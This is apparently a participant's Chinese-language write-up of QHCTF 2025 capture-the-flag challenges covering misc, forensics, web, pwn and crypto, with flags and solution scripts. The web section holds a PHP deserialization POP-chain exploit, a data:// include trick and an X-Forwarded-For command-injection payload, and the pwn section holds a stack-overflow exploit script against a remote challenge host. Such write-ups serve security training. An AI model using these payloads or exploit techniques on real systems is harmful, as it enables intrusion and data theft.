misc

PvzHE

去这个文件夹

 

有一张图片

QHCTF{300cef31-68d9-4b72-b49d-a7802da481a5}

QHCTF For Year 2025

攻防世界有一样的

080714212829302316092230

对应Q

 

以此类推

QHCTF{FUN}

请找出拍摄地所在位置

 

柳城

 

顺丰

 

forensics

win01

这个软件

 

云沙盒分析一下

 

md5

 

ad4fdee2eada36ec3c20e9d6311cf258

Win_02

 

HackY$

32ED87BDB5FDC5E9CBA88547376818D4

 

123456

HackY$_123456

 

fb484ad326c0f3a4970d1352bfbafef8

Win_07

 

找到密码

Th3_1s_F1ag.Z1p_P@ssW0rd_Y0u_Now

 

解压

 

QHCTF{6143b46a-8e98-4356-a9b2-251a7ec19e51}

web

Web_pop

 

 <?php
error_reporting(0);
highlight_file(__FILE__);
class Start{public $name;protected $func;public function __destruct(){echo "Welcome to QHCTF 2025, ".$this->name;}public function __isset($var){($this->func)();}
}class Sec{private $obj;private $var;public function __toString(){$this->obj->check($this->var);return "CTFers";}public function __invoke(){echo file_get_contents('/flag');}
}class Easy{public $cla;public function __call($fun, $var){$this->cla = clone $var[0];}
}class eeee{public $obj;public function __clone(){if(isset($this->obj->cmd)){echo "success";}}
}if(isset($_POST['pop'])){unserialize($_POST['pop']);
} 

后门在这里file_get_contents('/flag');

然后逆着看

__invoke

($this->func)();->__invoke

if(isset($this->obj->cmd))->($this->func)();->__invoke

$this->cla = clone $var[0];-> if(isset($this->obj->cmd))->($this->func)();->__invoke

$this->obj->check($this->var);->$this->cla = clone $var[0];-> if(isset($this->obj->cmd))->($this->func)();->__invoke

echo "Welcome to QHCTF 2025, ".$this->name;-> $this->obj->check($this->var);->$this->cla = clone $var[0];-> if(isset($this->obj->cmd))->($this->func)();->__invoke

这样来触发。

也就是

$a=new Start();

$a->name=new Sec();

$a->name->obj=new Easy();

$a->name->obj->cla=new eeee();

$a->name->obj->cla->obj=new Start();

$a->name->obj->cla->obj->func=new Sec();

exp：

<?php
error_reporting(0);
highlight_file(__FILE__);
class Start
{public $name;public $func;
​
}
​
class Sec
{public $obj;public $var;
​
}
​
class Easy
{public $cla;
​
}
​
class eeee
{public $obj;
​
​
}
​
$a = new Start;
$b = new Sec;
$c = new Easy;
$d = new eeee;
$e = new Sec;
$f = new Start;
$a->name = $b;
$b->obj = $c;
$b->var = $d;
$d->obj = $f;
$f->func = $e;
echo serialize($a);

Easy_include

?file=data://text/plain,

即可命令执行

 

Web_IP

 

IP的地方可以执行命令

X-Forwarded-For： {system('cat /flag')}

PCREMagic

 

可以上传文件，对文件名没有限制，最后都会重命名1-9.php

关键是文件内容检测<?php

pwn

Easy_Pwn

 

vulnerable

 

栈溢出

exp

from pwn import*
from struct import pack
from ctypes import *
#from LibcSearcher import *
context(os='linux',arch='amd64',log_level='debug')
p=remote('154.64.245.108',33135)
#p=process('./pwn')
libc=ELF("/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6")
elf=ELF('./pwn')
def bug():gdb.attach(p)pause()
def s(a):p.send(a)
def sa(a,b):p.sendafter(a,b)
def sl(a):p.sendline(a)
def sla(a,b):p.sendlineafter(a,b)
def r(a):p.recv(a)
def pr(a):print(p.recv(a))
def rl(a):return p.recvuntil(a)
def inter():p.interactive()
def get_addr64():return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():return u32(p.recvuntil("\xf7")[-4:])
def get_sb():return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
​
​
pay=b'a'*0x58+p64(0x4011ca)
#bug()
s(pay)
inter()

 

cr

Easy_RSA

from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
import base64
​
# 生成RSA密钥对
private_key = b'-----BEGIN RSA PRIVATE KEY-----\nMIICXAIBAAKBgQCYQjRaBQcBJmdxdCo4YaK/8TIdlj9Cjt6ewjF8NzV7BAj5ZEXy\nsuXdYbXVOAmVKDYKglo9TKUbRVKbPk7f3rIfnIrMqm8TpJTPAnyssiXs3Zy9yz+p\nqWbRTvd0xWJoWxy9TTzdczkS8yVkRBIdNJ3ghJV8B5YVkgFtMoyPX8TQhQIDAQAB\nAoGARibOvyEs2oNKyvO2VjbqCRzEtewZZn20JZqcuTooum6gAeQI9GsnzKnt4PkK\nNT6LM6lekXrEYb29c0iwh6YwE/mOIu5G3Yz2qQJDyZEqvM4N4KnITJM4v1WPv7tC\nurpZj906Odbx6oFXNc5XJMGp6GgjOqqLomBCcRvKlKdX36sCQQDA3GGS4Hy5htlQ\nydkiQujUAAlcoTlx/kPZSrCOehBsOWytwRjiGm1xTu6s8mBY2O+kIDZx1DGbDQ54\nKi9jJqWfAkEAyhr1iR9mofi+WqSfcG41jjmLFUgKFcO/ImcE3kcs2eGLodoyOJF1\nCBPw8ANME36OJiwXNSFOyQJWuzNoJchvWwJAG36Pjn/gaBaYXpMYGHFPfgGvU/xM\nEzs7cvvZ5cXzF2qsWqz/niREW/XzwsYfBCuRJmXNPTcSB1e6K1lgPhNhYwJBALZg\nxZnL4E3hrcUWMVq/2UxS2ROHQrKJRf3BgT8kc3Dae6q+v/sUJ8v2UsID967P0W7Y\n8shbGkGB/spHhYAy82kCQE7UVrGsArk46F1snawUIPUPMye3yBwvCeyCSX+WyQ7h\nS1IaHaAy3kJ9J/0faMDayG724TpMcsBii1pU2Hhh8p0=\n-----END RSA PRIVATE KEY-----'
public_key = b'-----BEGIN PUBLIC KEY-----\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCYQjRaBQcBJmdxdCo4YaK/8TId\nlj9Cjt6ewjF8NzV7BAj5ZEXysuXdYbXVOAmVKDYKglo9TKUbRVKbPk7f3rIfnIrM\nqm8TpJTPAnyssiXs3Zy9yz+pqWbRTvd0xWJoWxy9TTzdczkS8yVkRBIdNJ3ghJV8\nB5YVkgFtMoyPX8TQhQIDAQAB\n-----END PUBLIC KEY-----'
enmessage="PSvEAGef52/sz8q2f3jjC2OJP9pYEa04kSTeTIX3swnAMrJw9ZagvLRplqk+NjdCmvRAbnbYrBXi9aP8sz604rqn+7S58WTyPgnqIkFwynHBY7NTmvVAKKDc7GJWltQql4iVAxFbrwIBREcSZJwhloWGmCa5dBjlMEzWtv6Jx0o="
​
def encrypt_message(message, public_key):key = RSA.import_key(public_key)cipher = PKCS1_OAEP.new(key)encrypted_message = cipher.encrypt(message.encode())return base64.b64encode(encrypted_message).decode()
​
def decrypt_message(encrypted_message, private_key):key = RSA.import_key(private_key)cipher = PKCS1_OAEP.new(key)decrypted_message = cipher.decrypt(base64.b64decode(encrypted_message))return decrypted_message.decode()
​
#message = "Hello, this is a secret message!"
# encrypted = encrypt_message(message, public_key)
# print("加密后的消息:")
# print(encrypted)
​
decrypted = decrypt_message(enmessage, private_key)
print("解密后的消息:")
print(decrypted)

传入题目给的公钥，私钥，以及密文（访问靶机/encode）即可

 

QHCTF{ec9ee719-8336-4a7c-8c7f-745c89d220ce}